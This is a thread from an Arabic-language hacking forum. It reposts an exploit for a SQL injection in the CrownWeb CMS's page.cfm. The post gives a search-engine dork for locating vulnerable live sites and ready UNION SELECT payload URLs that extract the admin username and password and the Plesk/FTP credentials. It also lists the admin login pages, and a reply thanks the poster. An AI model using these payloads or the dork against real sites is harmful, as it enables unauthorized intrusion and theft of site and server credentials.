crownweb (page.cfm) Sql Injection Vulnerability

crownweb (page.cfm) Sql Injection Vulnerability


النتائج 1 إلى 2 من 2

الموضوع: crownweb (page.cfm) Sql Injection Vulnerability

  1. #1

    افتراضي crownweb (page.cfm) Sql Injection Vulnerability

    crownweb (page.cfm) Sql Injection Vulnerability


    كود:
    ####################################################################
    .:. Email : [email protected]
    .:. Team : Sec Attack Team
    .:. Home : www.sec-attack.com/vb
    .:. Script : crownweb
    .:. ******** : Cfm
    .:. Script Download: http://www.crownweb.net/
    .:. Bug Type : Sql Injection[Mysql]
    .:. Dork : "Powered By CrownWeb.net!" inurl:"page.cfm"
    ####################################################################
     
    ===[ Exploit ]===
     
    www.Localhost.com/page.cfm?id=[Sql Injection]
     
    ********************************************************************
    T0 Get Username & Password Admin Site
     
    [Sql Injection ; {Name & password Admin}]
     
    www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author
     
    WEBSITE LOGIN: www.localhost.com/siteadmin/
     
    [~] Name : Webadmin
    [~] Password : Sec-Attack
     
    ********************************************************************
    T0 Get Username & Password Plesk Control Panel
     
    [Sql Injection ; {Username & Password Plesk Control Panel}]
     
    www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata
     
    WEBSITE LOGIN: https://IP SRVER:8443/login.php3
     
    [~] ftpserver : 127.0.0.1
    [~] domainname : Localhost.com
    [~] ftpusername : Root
    [~] ftppassword : Sec-Attack
     
    ####################################################################
     
    Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack

  2. #2

    افتراضي رد: crownweb (page.cfm) Sql Injection Vulnerability

    مشكووور وما قصرت والله يعطيك العافيه

    دمت في تألق وابداع


    إن المحبة الصادقة كعلاقة اليد بالعين إذا تألمت اليد دمعت العين وإذا دمعت العين مسحتها اليد

المواضيع المتشابهه

  1. ShoutCMS (content.php) Blind Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-02-2010, 02:47 PM
  2. Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 02-02-2010, 12:05 AM
  3. ThinkAdmin (page.php) Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 02-01-2010, 03:03 AM
  4. joomla component com_simplefaq (catid) Blind SQL Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 01-31-2010, 01:50 PM
  5. Web Page Maker 3.1 الأسهل لتصميم صفحة ويب
    بواسطة sotc2008 في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 2
    آخر مشاركة: 09-02-2009, 03:48 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •